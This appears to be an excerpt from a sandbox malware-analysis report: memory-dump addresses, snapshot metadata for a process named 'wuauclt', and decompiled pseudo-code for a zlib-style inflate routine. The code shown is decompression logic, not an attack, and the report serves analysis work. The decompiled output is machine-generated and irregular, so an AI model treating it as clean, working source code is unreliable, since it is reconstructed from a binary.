                                                0x00251fcf
                                                0x00251fd2
                                                0x00251fd5
                                                0x00251fdb
                                                0x00251fdd
                                                0x00251fe1
                                                0x00251fe4
                                                0x00251fe7
                                                0x00251fea
                                                0x00251fed
                                                0x00251ff5
                                                0x00251ff6
                                                0x00251ffc
                                                0x00000000
                                                0x00000000
                                                0x0025180d
                                                0x0025244d
                                                0x00252455
                                                0x00252458
                                                0x00252460
                                                0x00252463
                                                0x0025246b
                                                0x00252476
                                                0x0025247a
                                                0x0025248c
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$invalid stored block lengths
                                                • API String ID: 0-2993959977
                                                • Opcode ID: 9427d0e82036d2061532009b219701dc1d562e98beb7c34530e794e232200767
                                                • Instruction ID: 3a0387529917919b3716c5ccc7a2983cb11233bc5db7fbb95b1961682ade4525
                                                • Opcode Fuzzy Hash: 9427d0e82036d2061532009b219701dc1d562e98beb7c34530e794e232200767
                                                • Instruction Fuzzy Hash: 5C426DB56143018FCB08CF19D88062ABBE6FFC9301F14856DEC898B356E771E959CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002526B0 Relevance: 3.0, Strings: 2, Instructions: 470COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E002526B0() {
				signed int* _t298;
				signed char _t337;
				intOrPtr _t343;
				intOrPtr _t345;
				signed int _t346;
				intOrPtr _t387;
				signed int _t393;
				intOrPtr _t394;
				void* _t395;
				void* _t396;

				_t394 =  *((intOrPtr*)(_t396 + 0x20));
				_t393 =  *(_t396 + 0x28);
				_t298 =  *(_t394 + 4);
				_t395 =  *_t393;
				_t337 =  *(_t394 + 0x1c);
				 *(_t396 + 0x28) =  *(_t393 + 4);
				_t343 =  *((intOrPtr*)(_t394 + 0x30));
				 *(_t396 + 0x24) =  *(_t394 + 0x20);
				_t387 =  *((intOrPtr*)(_t394 + 0x34));
				 *(_t396 + 0x10) = _t298;
				if(_t387 >= _t343) {
					_t345 =  *((intOrPtr*)(_t394 + 0x2c)) - _t387;
				} else {
					_t345 = _t343 - _t387 - 1;
				}
				 *((intOrPtr*)(_t396 + 0x14)) = _t345;
				while(1) {
					L4:
					_t346 =  *_t298;
					if(_t346 > 9) {
						break;
					}
					switch( *((intOrPtr*)(_t346 * 4 +  &M00252E30))) {
						case 0:
							if( *((intOrPtr*)(_t396 + 0x14)) < 0x102 ||  *(_t396 + 0x28) < 0xa) {
								L13:
								_t303 =  *(_t396 + 0x10);
								 *_t303 = 1;
								_t303[3] = 0;
								_t303[2] = _t303[5];
								goto L14;
							} else {
								 *(_t394 + 0x20) =  *(_t396 + 0x24);
								 *(_t394 + 0x1c) = _t337;
								 *(_t393 + 4) =  *(_t396 + 0x28);
								 *_t393 = _t395;
								_t331 =  *(_t396 + 0x10);
								 *((intOrPtr*)(_t393 + 8)) =  *((intOrPtr*)(_t393 + 8)) + _t395 -  *_t393;
								 *((intOrPtr*)(_t394 + 0x34)) = _t387;
								_push(_t393);
								_push(_t394);
								_push(_t331[6]);
								_push(_t331[5]);
								_push(0);
								_push(0);
								_t332 = E002536F0();
								_t395 =  *_t393;
								_t337 =  *(_t394 + 0x1c);
								 *(_t396 + 0x40) =  *(_t393 + 4);
								_t380 =  *((intOrPtr*)(_t394 + 0x30));
								 *(_t396 + 0x3c) =  *(_t394 + 0x20);
								_t387 =  *((intOrPtr*)(_t394 + 0x34));
								_t396 = _t396 + 0x18;
								 *(_t396 + 0x2c) = _t332;
								if(_t387 >= _t380) {
									_t382 =  *((intOrPtr*)(_t394 + 0x2c)) - _t387;
								} else {
									_t382 = _t380 - _t387 - 1;
								}
								 *((intOrPtr*)(_t396 + 0x14)) = _t382;
								if(_t332 == 0) {
									goto L13;
								} else {
									_t383 =  *(_t396 + 0x10);
									asm("sbb eax, eax");
									 *_t383 = ( ~(_t332 - 1) & 0x00000002) + 7;
									_t298 = _t383;
									goto L4;
								}
							}
							goto L100;
						case 1:
							L14:
							_t304 = _t303[3];
							 *(_t396 + 0x18) = _t304;
							if(_t337 >= _t304) {
								L17:
								_t308 = ( *(_t396 + 0x10))[2] + ( *(0x2723c8 + _t304 * 4) &  *(_t396 + 0x24)) * 8;
								 *(_t396 + 0x18) = _t308;
								 *((intOrPtr*)(_t396 + 0x1c)) = 0;
								 *(_t396 + 0x24) =  *(_t396 + 0x24) >>  *(_t308 + 1);
								_t337 = _t337;
								_t312 =  *(_t396 + 0x18);
								_t358 =  *_t312;
								if(0 != 0) {
									if((_t358 & 0x00000010) == 0) {
										if((_t358 & 0x00000040) != 0) {
											_t298 =  *(_t396 + 0x10);
											if((_t358 & 0x00000020) == 0) {
												 *_t298 = 9;
												 *(_t393 + 0x18) = "invalid literal/length code";
												goto L90;
											} else {
												 *_t298 = 7;
												goto L4;
											}
										} else {
											goto L22;
										}
									} else {
										_t298 =  *(_t396 + 0x10);
										_t298[2] = 0;
										 *_t298 = 2;
										_t298[1] =  *( *(_t396 + 0x18) + 4);
										goto L4;
									}
								} else {
									_t298 =  *(_t396 + 0x10);
									_t298[2] =  *(_t312 + 4);
									 *_t298 = 6;
									goto L4;
								}
							} else {
								while(1) {
									_t319 =  *(_t396 + 0x28);
									if(_t319 == 0) {
										goto L88;
									}
									_t370 = _t337;
									 *(_t396 + 0x28) = _t319 - 1;
									_t337 = _t337 + 8;
									 *(_t396 + 0x2c) = 0;
									_t304 =  *(_t396 + 0x18);
									_t395 = _t395 + 1;
									 *(_t396 + 0x24) =  *(_t396 + 0x24) | 0 << _t370;
									if(_t337 < _t304) {
										continue;
									} else {
										goto L17;
									}
									goto L100;
								}
								goto L88;
							}
							goto L100;
						case 2:
							__eax =  *(__eax + 8);
							 *(__esp + 0x18) = __eax;
							if(__ebx >= __eax) {
								L28:
								__ecx =  *(0x2723c8 + __eax * 4);
								__eax =  *(__esp + 0x24);
								__ecx = __ecx &  *(__esp + 0x24);
								__eax =  *(__esp + 0x10);
								 *((intOrPtr*)( *(__esp + 0x10) + 4)) =  *((intOrPtr*)( *(__esp + 0x10) + 4)) + __ecx;
								__ecx =  *(__esp + 0x18);
								 *(__esp + 0x24) =  *(__esp + 0x24) >> __cl;
								 *(__esp + 0x24) =  *(__esp + 0x24) >> __cl;
								__eax =  *(__esp + 0x18);
								__ebx = __ebx -  *(__esp + 0x18);
								__eax =  *(__esp + 0x10);
								__ecx = 0;
								__cl =  *((intOrPtr*)(__eax + 0x11));
								 *__eax = 3;
								 *(__eax + 0xc) = 0;
								__ecx =  *(__eax + 0x18);
								 *(__eax + 8) =  *(__eax + 0x18);
								goto L29;
							} else {
								while(1) {
									__eax =  *(__esp + 0x28);
									if(__eax == 0) {
										goto L88;
									}
									__eax = __eax - 1;
									__ecx = __ebx;
									 *(__esp + 0x28) = __eax;
									__eax = 0;
									__ebx = __ebx + 8;
									__eax = 0 << __cl;
									__ecx =  *(__esp + 0x24);
									 *(__esp + 0x2c) = 0;
									__ecx =  *(__esp + 0x24) | 0 << __cl;
									__eax =  *(__esp + 0x18);
									__ebp = __ebp + 1;
									 *(__esp + 0x24) =  *(__esp + 0x24) | 0 << __cl;
									if(__ebx < __eax) {
										continue;
									} else {
										goto L28;
									}
									goto L100;
								}
								goto L88;
							}
							goto L100;
						case 3:
							L29:
							__eax =  *(__eax + 0xc);
							 *(__esp + 0x18) = __eax;
							if(__ebx >= __eax) {
								L32:
								__ecx =  *(0x2723c8 + __eax * 4);
								__eax =  *(__esp + 0x24);
								__ecx = __ecx &  *(__esp + 0x24);
								 *(__esp + 0x10) =  *( *(__esp + 0x10) + 8);
								__eax =  *( *(__esp + 0x10) + 8) + __ecx * 8;
								__ecx = 0;
								 *(__esp + 0x18) = __eax;
								__cl =  *((intOrPtr*)(__eax + 1));
								 *(__esp + 0x24) =  *(__esp + 0x24) >> __cl;
								 *(__esp + 0x1c) = 0;
								__ebx = __ebx;
								__ecx = 0;
								 *(__esp + 0x24) =  *(__esp + 0x24) >> __cl;
								__eax =  *(__esp + 0x18);
								__cl =  *__eax;
								if((__cl & 0x00000010) == 0) {
									if((__cl & 0x00000040) != 0) {
										__eax =  *(__esp + 0x10);
										 *( *(__esp + 0x10)) = 9;
										__edi[6] = "invalid distance code";
										L90:
										 *(_t394 + 0x20) =  *(_t396 + 0x24);
										 *(_t394 + 0x1c) = _t337;
										 *(_t393 + 4) =  *(_t396 + 0x28);
										 *((intOrPtr*)(_t393 + 8)) =  *((intOrPtr*)(_t393 + 8)) + _t395 -  *_t393;
										 *_t393 = _t395;
										 *((intOrPtr*)(_t394 + 0x34)) = _t387;
										return E002535B0(_t394, _t393, 0xfffffffd);
									} else {
										L22:
										( *(_t396 + 0x10))[3] = _t358;
										_t318 =  *(_t396 + 0x18);
										_t298 =  *(_t396 + 0x10);
										_t298[2] =  *(_t396 + 0x18) +  *(_t318 + 4) * 8;
										goto L4;
									}
								} else {
									__eax =  *(__esp + 0x10);
									__ecx = 0;
									 *(__eax + 8) = 0;
									 *(__esp + 0x18) =  *( *(__esp + 0x18) + 4);
									 *__eax = 4;
									 *(__eax + 0xc) =  *( *(__esp + 0x18) + 4);
									goto L4;
								}
							} else {
								while(1) {
									__eax =  *(__esp + 0x28);
									if(__eax == 0) {
										goto L88;
									}
									__eax = __eax - 1;
									__ecx = __ebx;
									 *(__esp + 0x28) = __eax;
									__eax = 0;
									__ebx = __ebx + 8;
									__eax = 0 << __cl;
									__ecx =  *(__esp + 0x24);
									 *(__esp + 0x2c) = 0;
									__ecx =  *(__esp + 0x24) | 0 << __cl;
									__eax =  *(__esp + 0x18);
									__ebp = __ebp + 1;
									 *(__esp + 0x24) =  *(__esp + 0x24) | 0 << __cl;
									if(__ebx < __eax) {
										continue;
									} else {
										goto L32;
									}
									goto L100;
								}
								goto L88;
							}
							goto L100;
						case 4:
							__eax =  *(__eax + 8);
							 *(__esp + 0x18) = __eax;
							if(__ebx >= __eax) {
								L39:
								__ecx =  *(0x2723c8 + __eax * 4);
								__eax =  *(__esp + 0x24);
								__ecx = __ecx &  *(__esp + 0x24);
								__eax =  *(__esp + 0x10);
								 *((intOrPtr*)( *(__esp + 0x10) + 0xc)) =  *((intOrPtr*)( *(__esp + 0x10) + 0xc)) + __ecx;
								__ecx =  *(__esp + 0x18);
								 *(__esp + 0x24) =  *(__esp + 0x24) >> __cl;
								 *(__esp + 0x24) =  *(__esp + 0x24) >> __cl;
								__eax =  *(__esp + 0x18);
								__ebx = __ebx -  *(__esp + 0x18);
								__eax =  *(__esp + 0x10);
								 *__eax = 5;
								goto L40;
							} else {
								while(1) {
									__eax =  *(__esp + 0x28);
									if(__eax == 0) {
										break;
									}
									__eax = __eax - 1;
									__ecx = __ebx;
									 *(__esp + 0x28) = __eax;
									__eax = 0;
									__ebx = __ebx + 8;
									__eax = 0 << __cl;
									__ecx =  *(__esp + 0x24);
									 *(__esp + 0x2c) = 0;
									__ecx =  *(__esp + 0x24) | 0 << __cl;
									__eax =  *(__esp + 0x18);
									__ebp = __ebp + 1;
									 *(__esp + 0x24) =  *(__esp + 0x24) | 0 << __cl;
									if(__ebx < __eax) {
										continue;
									} else {
										goto L39;
									}
									goto L100;
								}
								L88:
								 *(_t394 + 0x1c) = _t337;
								 *(_t394 + 0x20) =  *(_t396 + 0x24);
								 *(_t393 + 4) = 0;
								 *_t393 = _t395;
								 *((intOrPtr*)(_t393 + 8)) =  *((intOrPtr*)(_t393 + 8)) + _t395 -  *_t393;
								 *((intOrPtr*)(_t394 + 0x34)) = _t387;
								return E002535B0(_t394, _t393,  *(_t396 + 0x2c));
							}
							goto L100;
						case 5:
							L40:
							__ecx = __edx;
							__ecx = __edx -  *(__eax + 0xc);
							__eax =  *(__esi + 0x28);
							 *(__esp + 0x18) = __ecx;
							if(__ecx < __eax) {
								__ecx =  *(__esi + 0x2c);
								__ecx =  *(__esi + 0x2c) - __eax;
								__eax =  *(__esp + 0x18);
								 *(__esp + 0x1c) = __ecx;
								while(1) {
									__eax = __eax + __ecx;
									__ecx =  *(__esi + 0x28);
									if(__eax >=  *(__esi + 0x28)) {
										break;
									}
									__ecx =  *(__esp + 0x1c);
								}
								 *(__esp + 0x18) = __eax;
							}
							__eax =  *(__esp + 0x10);
							__ecx =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								L67:
								 *__eax = 0;
								goto L4;
							} else {
								do {
									__ecx =  *(__esp + 0x14);
									if( *(__esp + 0x14) != 0) {
										goto L64;
									} else {
										__eax =  *(__esi + 0x2c);
										 *(__esp + 0x1c) = __eax;
										if(__edx != __eax) {
											L53:
											 *(__esi + 0x34) = __edx;
											__edx =  *(__esp + 0x2c);
											__eax = E002535B0(__esi, __edi,  *(__esp + 0x2c));
											__edx =  *(__esi + 0x34);
											 *(__esp + 0x38) = __eax;
											__eax =  *(__esi + 0x30);
											if(__edx >= __eax) {
												__ecx =  *(__esi + 0x2c);
												__ecx =  *(__esi + 0x2c) - __edx;
											} else {
												__eax = __eax - __edx;
												__ecx = __eax - __edx - 1;
											}
											 *(__esp + 0x14) = __ecx;
											__ecx =  *(__esi + 0x2c);
											 *(__esp + 0x1c) = __ecx;
											if(__edx == __ecx) {
												__ecx =  *(__esi + 0x28);
												if(__eax != __ecx) {
													__edx = __ecx;
													if(__edx >= __eax) {
														__eax =  *(__esp + 0x1c);
														__eax =  *(__esp + 0x1c) - __edx;
													} else {
														__eax = __eax - __edx;
														__eax = __eax - 1;
													}
													 *(__esp + 0x14) = __eax;
												}
											}
											__eax =  *(__esp + 0x14);
											if( *(__esp + 0x14) == 0) {
												goto L91;
											} else {
												goto L63;
											}
										} else {
											__eax =  *(__esi + 0x30);
											__ecx =  *(__esi + 0x28);
											if(__eax == __ecx) {
												goto L53;
											} else {
												__edx = __ecx;
												if(__edx >= __eax) {
													__eax =  *(__esp + 0x1c);
													__eax =  *(__esp + 0x1c) - __edx;
												} else {
													__eax = __eax - __edx;
													__eax = __eax - 1;
												}
												 *(__esp + 0x14) = __eax;
												if(__eax != 0) {
													L63:
													__eax =  *(__esp + 0x10);
													goto L64;
												} else {
													goto L53;
												}
											}
										}
									}
									goto L100;
									L64:
									__ecx =  *(__esp + 0x18);
									__edx = __edx + 1;
									 *(__esp + 0x2c) = 0;
									__cl =  *( *(__esp + 0x18));
									 *(__edx - 1) = __cl;
									 *(__esp + 0x18) =  *(__esp + 0x18) + 1;
									 *(__esp + 0x18) =  *(__esp + 0x18) + 1;
									 *(__esp + 0x14) =  *(__esp + 0x14) - 1;
									 *(__esp + 0x14) =  *(__esp + 0x14) - 1;
									__ecx =  *(__esp + 0x18);
									if( *(__esp + 0x18) ==  *(__esi + 0x2c)) {
										__ecx =  *(__esi + 0x28);
										 *(__esp + 0x18) =  *(__esi + 0x28);
									}
									__ecx =  *(__eax + 4);
									__ecx =  *(__eax + 4) - 1;
									 *(__eax + 4) = __ecx;
								} while (__ecx != 0);
								goto L67;
							}
							goto L100;
						case 6:
							__ecx =  *(__esp + 0x14);
							if( *(__esp + 0x14) != 0) {
								L86:
								__cl =  *(__eax + 8);
								 *(__esp + 0x2c) = 0;
								 *__edx = __cl;
								__ecx =  *(__esp + 0x14);
								__edx = __edx + 1;
								__ecx =  *(__esp + 0x14) - 1;
								 *(__esp + 0x14) =  *(__esp + 0x14) - 1;
								 *__eax = 0;
								goto L4;
							} else {
								__eax =  *(__esi + 0x2c);
								 *(__esp + 0x1c) = __eax;
								if(__edx != __eax) {
									L75:
									 *(__esi + 0x34) = __edx;
									__edx =  *(__esp + 0x2c);
									__eax = E002535B0(__esi, __edi,  *(__esp + 0x2c));
									__edx =  *(__esi + 0x34);
									 *(__esp + 0x38) = __eax;
									__eax =  *(__esi + 0x30);
									if(__edx >= __eax) {
										__ecx =  *(__esi + 0x2c);
										__ecx =  *(__esi + 0x2c) - __edx;
									} else {
										__eax = __eax - __edx;
										__ecx = __eax - __edx - 1;
									}
									 *(__esp + 0x14) = __ecx;
									__ecx =  *(__esi + 0x2c);
									 *(__esp + 0x1c) = __ecx;
									if(__edx == __ecx) {
										__ecx =  *(__esi + 0x28);
										if(__eax != __ecx) {
											__edx = __ecx;
											if(__edx >= __eax) {
												__eax =  *(__esp + 0x1c);
												__eax =  *(__esp + 0x1c) - __edx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											 *(__esp + 0x14) = __eax;
										}
									}
									__eax =  *(__esp + 0x14);
									if( *(__esp + 0x14) == 0) {
										L91:
										__eax =  *(__esp + 0x24);
										__ecx =  *(__esp + 0x28);
										 *(__esi + 0x20) =  *(__esp + 0x24);
										 *(__esi + 0x1c) = __ebx;
										__ebx =  *__edi;
										__eax = __ebp;
										__edi[1] =  *(__esp + 0x28);
										__ecx = __edi[2];
										__eax = __ebp -  *__edi;
										 *__edi = __ebp;
										__ecx = __edi[2] + __ebp -  *__edi;
										__edi[2] = __edi[2] + __ebp -  *__edi;
										__ecx =  *(__esp + 0x2c);
										 *(__esi + 0x34) = __edx;
										return E002535B0(__esi, __edi,  *(__esp + 0x2c));
									} else {
										goto L85;
									}
								} else {
									__eax =  *(__esi + 0x30);
									__ecx =  *(__esi + 0x28);
									if(__eax == __ecx) {
										goto L75;
									} else {
										__edx = __ecx;
										if(__edx >= __eax) {
											__eax =  *(__esp + 0x1c);
											__eax =  *(__esp + 0x1c) - __edx;
										} else {
											__eax = __eax - __edx;
											__eax = __eax - 1;
										}
										 *(__esp + 0x14) = __eax;
										if(__eax != 0) {
											L85:
											__eax =  *(__esp + 0x10);
											goto L86;
										} else {
											goto L75;
										}
									}
								}
							}
							goto L100;
						case 7:
							if(__ebx > 7) {
								__ecx =  *(__esp + 0x28);
								__ebx = __ebx - 8;
								__ecx =  *(__esp + 0x28) + 1;
								__ebp = __ebp - 1;
								 *(__esp + 0x28) =  *(__esp + 0x28) + 1;
							}
							 *(__esi + 0x34) = __edx;
							__edx =  *(__esp + 0x2c);
							__eax = E002535B0(__esi, __edi,  *(__esp + 0x2c));
							__edx =  *(__esi + 0x34);
							__ecx =  *(__esi + 0x30);
							if( *(__esi + 0x30) == __edx) {
								__eax =  *(__esp + 0x10);
								 *( *(__esp + 0x10)) = 8;
								goto L97;
							} else {
								__ecx =  *(__esp + 0x24);
								 *(__esi + 0x1c) = __ebx;
								 *(__esi + 0x20) =  *(__esp + 0x24);
								__ecx =  *(__esp + 0x28);
								__ebx =  *__edi;
								__edi[1] =  *(__esp + 0x28);
								__ebp = __ebp -  *__edi;
								__edi[2] = __edi[2] + __ebp -  *__edi;
								__edi[2] = __edi[2] + __ebp -  *__edi;
								 *__edi = __ebp;
								 *(__esi + 0x34) = __edx;
								return __eax;
							}
							goto L100;
						case 8:
							L97:
							__ecx =  *(__esp + 0x24);
							__eax =  *(__esp + 0x28);
							 *(__esi + 0x20) =  *(__esp + 0x24);
							 *(__esi + 0x1c) = __ebx;
							__ebx =  *__edi;
							__ecx = __ebp;
							__edi[1] =  *(__esp + 0x28);
							__eax = __edi[2];
							__ecx = __ebp -  *__edi;
							__eax = __edi[2] + __ebp -  *__edi;
							__edi[2] = __edi[2] + __ebp -  *__edi;
							 *__edi = __ebp;
							 *(__esi + 0x34) = __edx;
							return E002535B0(__esi, __edi, 1);
							goto L100;
						case 9:
							__eax =  *(__esp + 0x24);
							__ecx =  *(__esp + 0x28);
							 *(__esi + 0x20) =  *(__esp + 0x24);
							 *(__esi + 0x1c) = __ebx;
							__ebx =  *__edi;
							__eax = __ebp;
							__edi[1] =  *(__esp + 0x28);
							__ecx = __edi[2];
							__eax = __ebp -  *__edi;
							__ecx = __edi[2] + __ebp -  *__edi;
							__edi[2] = __edi[2] + __ebp -  *__edi;
							 *__edi = __ebp;
							 *(__esi + 0x34) = __edx;
							return E002535B0(__esi, __edi, 0xfffffffd);
							L100:
					}
				}
				 *(_t394 + 0x20) =  *(_t396 + 0x24);
				 *(_t394 + 0x1c) = _t337;
				 *(_t393 + 4) =  *(_t396 + 0x28);
				 *((intOrPtr*)(_t393 + 8)) =  *((intOrPtr*)(_t393 + 8)) + _t395 -  *_t393;
				 *_t393 = _t395;
				 *((intOrPtr*)(_t394 + 0x34)) = _t387;
				return E002535B0(_t394, _t393, 0xfffffffe);
				goto L100;
			}













                                                0x002526b6
                                                0x002526bb
                                                0x002526c2
                                                0x002526c8
                                                0x002526ca
                                                0x002526cd
                                                0x002526d1
                                                0x002526d4
                                                0x002526d8
                                                0x002526db
                                                0x002526e1
                                                0x002526eb
                                                0x002526e3
                                                0x002526e5
                                                0x002526e5
                                                0x002526ed
                                                0x002526f1
                                                0x002526f1
                                                0x002526f1
                                                0x002526f6
                                                0x00000000
                                                0x00000000
                                                0x002526fc
                                                0x00000000
                                                0x0025270b
                                                0x002527ad
                                                0x002527ad
                                                0x002527b6
                                                0x002527bc
                                                0x002527c2
                                                0x00000000
                                                0x0025271c
                                                0x00252724
                                                0x00252727
                                                0x0025272e
                                                0x00252736
                                                0x0025273a
                                                0x0025273e
                                                0x00252741
                                                0x0025274a
                                                0x0025274b
                                                0x0025274c
                                                0x0025274d
                                                0x00252758
                                                0x00252759
                                                0x0025275a
                                                0x00252765
                                                0x00252767
                                                0x0025276a
                                                0x0025276e
                                                0x00252771
                                                0x00252775
                                                0x00252778
                                                0x0025277d
                                                0x00252781
                                                0x0025278b
                                                0x00252783
                                                0x00252785
                                                0x00252785
                                                0x0025278f
                                                0x00252793
                                                0x00000000
                                                0x00252795
                                                0x00252795
                                                0x0025279c
                                                0x002527a4
                                                0x002527a6
                                                0x00000000
                                                0x002527a6
                                                0x00252793
                                                0x00000000
                                                0x00000000
                                                0x002527c5
                                                0x002527c5
                                                0x002527ca
                                                0x002527ce
                                                0x00252808
                                                0x0025281c
                                                0x00252821
                                                0x0025282e
                                                0x00252832
                                                0x00252838
                                                0x0025283a
                                                0x00252840
                                                0x00252844
                                                0x0025285e
                                                0x00252882
                                                0x002528a1
                                                0x002528a8
                                                0x00252c49
                                                0x00252c4f
                                                0x00000000
                                                0x002528ae
                                                0x002528ae
                                                0x00000000
                                                0x002528ae
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00252860
                                                0x00252860
                                                0x00252867
                                                0x00252871
                                                0x00252877
                                                0x00000000
                                                0x00252877
                                                0x00252846
                                                0x00252849
                                                0x0025284d
                                                0x00252850
                                                0x00000000
                                                0x00252850
                                                0x002527d0
                                                0x002527d0
                                                0x002527d0
                                                0x002527d6
                                                0x00000000
                                                0x00000000
                                                0x002527dd
                                                0x002527df
                                                0x002527e8
                                                0x002527f1
                                                0x002527fb
                                                0x002527ff
                                                0x00252802
                                                0x00252806
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00252806
                                                0x00000000
                                                0x002527d0
                                                0x00000000
                                                0x00000000
                                                0x002528b9
                                                0x002528be
                                                0x002528c2
                                                0x002528fc
                                                0x002528fc
                                                0x00252903
                                                0x00252907
                                                0x00252909
                                                0x0025290d
                                                0x00252910
                                                0x00252918
                                                0x0025291a
                                                0x0025291e
                                                0x00252920
                                                0x00252922
                                                0x00252926
                                                0x00252928
                                                0x0025292b
                                                0x00252931
                                                0x00252934
                                                0x00252937
                                                0x00000000
                                                0x002528c4
                                                0x002528c4
                                                0x002528c4
                                                0x002528ca
                                                0x00000000
                                                0x00000000
                                                0x002528d0
                                                0x002528d1
                                                0x002528d3
                                                0x002528d7
                                                0x002528dc
                                                0x002528df
                                                0x002528e1
                                                0x002528e5
                                                0x002528ed
                                                0x002528ef
                                                0x002528f3
                                                0x002528f6
                                                0x002528fa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002528fa
                                                0x00000000
                                                0x002528c4
                                                0x00000000
                                                0x00000000
                                                0x0025293a
                                                0x0025293a
                                                0x0025293f
                                                0x00252943
                                                0x0025297d
                                                0x0025297d
                                                0x00252984
                                                0x00252988
                                                0x0025298e
                                                0x00252991
                                                0x00252994
                                                0x00252996
                                                0x0025299a
                                                0x002529a1
                                                0x002529a3
                                                0x002529a7
                                                0x002529a9
                                                0x002529ab
                                                0x002529af
                                                0x002529b3
                                                0x002529b8
                                                0x002529dc
                                                0x00252c93
                                                0x00252c97
                                                0x00252c9d
                                                0x00252ca4
                                                0x00252cac
                                                0x00252caf
                                                0x00252cb6
                                                0x00252cc3
                                                0x00252cc6
                                                0x00252cc9
                                                0x00252cdb
                                                0x002529e2
                                                0x00252884
                                                0x00252888
                                                0x0025288b
                                                0x00252895
                                                0x00252899
                                                0x00000000
                                                0x00252899
                                                0x002529ba
                                                0x002529ba
                                                0x002529be
                                                0x002529c1
                                                0x002529c8
                                                0x002529cb
                                                0x002529d1
                                                0x00000000
                                                0x002529d1
                                                0x00252945
                                                0x00252945
                                                0x00252945
                                                0x0025294b
                                                0x00000000
                                                0x00000000
                                                0x00252951
                                                0x00252952
                                                0x00252954
                                                0x00252958
                                                0x0025295d
                                                0x00252960
                                                0x00252962
                                                0x00252966
                                                0x0025296e
                                                0x00252970
                                                0x00252974
                                                0x00252977
                                                0x0025297b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025297b
                                                0x00000000
                                                0x00252945
                                                0x00000000
                                                0x00000000
                                                0x002529e7
                                                0x002529ec
                                                0x002529f0
                                                0x00252a2a
                                                0x00252a2a
                                                0x00252a31
                                                0x00252a35
                                                0x00252a37
                                                0x00252a3b
                                                0x00252a3e
                                                0x00252a46
                                                0x00252a48
                                                0x00252a4c
                                                0x00252a4e
                                                0x00252a50
                                                0x00252a54
                                                0x00000000
                                                0x002529f2
                                                0x002529f2
                                                0x002529f2
                                                0x002529f8
                                                0x00000000
                                                0x00000000
                                                0x002529fe
                                                0x002529ff
                                                0x00252a01
                                                0x00252a05
                                                0x00252a0a
                                                0x00252a0d
                                                0x00252a0f
                                                0x00252a13
                                                0x00252a1b
                                                0x00252a1d
                                                0x00252a21
                                                0x00252a24
                                                0x00252a28
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00252a28
                                                0x00252c58
                                                0x00252c5c
                                                0x00252c5f
                                                0x00252c6b
                                                0x00252c74
                                                0x00252c76
                                                0x00252c79
                                                0x00252c92
                                                0x00252c92
                                                0x00000000
                                                0x00000000
                                                0x00252a5a
                                                0x00252a5a
                                                0x00252a5c
                                                0x00252a5f
                                                0x00252a64
                                                0x00252a68
                                                0x00252a6a
                                                0x00252a6d
                                                0x00252a6f
                                                0x00252a73
                                                0x00252a7d
                                                0x00252a7d
                                                0x00252a7f
                                                0x00252a84
                                                0x00000000
                                                0x00000000
                                                0x00252a79
                                                0x00252a79
                                                0x00252a86
                                                0x00252a86
                                                0x00252a8a
                                                0x00252a8e
                                                0x00252a93
                                                0x00252b7b
                                                0x00252b7b
                                                0x00000000
                                                0x00252a99
                                                0x00252a99
                                                0x00252a99
                                                0x00252a9f
                                                0x00000000
                                                0x00252aa5
                                                0x00252aa5
                                                0x00252aaa
                                                0x00252aae
                                                0x00252ad3
                                                0x00252ad3
                                                0x00252ad6
                                                0x00252add
                                                0x00252ae2
                                                0x00252ae5
                                                0x00252ae9
                                                0x00252af1
                                                0x00252afa
                                                0x00252afd
                                                0x00252af3
                                                0x00252af5
                                                0x00252af7
                                                0x00252af7
                                                0x00252aff
                                                0x00252b03
                                                0x00252b08
                                                0x00252b0c
                                                0x00252b0e
                                                0x00252b13
                                                0x00252b15
                                                0x00252b19
                                                0x00252b20
                                                0x00252b24
                                                0x00252b1b
                                                0x00252b1b
                                                0x00252b1d
                                                0x00252b1d
                                                0x00252b26
                                                0x00252b26
                                                0x00252b13
                                                0x00252b2a
                                                0x00252b30
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00252ab0
                                                0x00252ab0
                                                0x00252ab3
                                                0x00252ab8
                                                0x00000000
                                                0x00252aba
                                                0x00252aba
                                                0x00252abe
                                                0x00252ac5
                                                0x00252ac9
                                                0x00252ac0
                                                0x00252ac0
                                                0x00252ac2
                                                0x00252ac2
                                                0x00252acd
                                                0x00252ad1
                                                0x00252b36
                                                0x00252b36
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00252ad1
                                                0x00252ab8
                                                0x00252aae
                                                0x00000000
                                                0x00252b3a
                                                0x00252b3a
                                                0x00252b3e
                                                0x00252b3f
                                                0x00252b47
                                                0x00252b49
                                                0x00252b50
                                                0x00252b51
                                                0x00252b59
                                                0x00252b5a
                                                0x00252b5e
                                                0x00252b65
                                                0x00252b67
                                                0x00252b6a
                                                0x00252b6a
                                                0x00252b6e
                                                0x00252b71
                                                0x00252b72
                                                0x00252b72
                                                0x00000000
                                                0x00252a99
                                                0x00000000
                                                0x00000000
                                                0x00252b86
                                                0x00252b8c
                                                0x00252c27
                                                0x00252c27
                                                0x00252c2a
                                                0x00252c32
                                                0x00252c34
                                                0x00252c38
                                                0x00252c39
                                                0x00252c3a
                                                0x00252c3e
                                                0x00000000
                                                0x00252b92
                                                0x00252b92
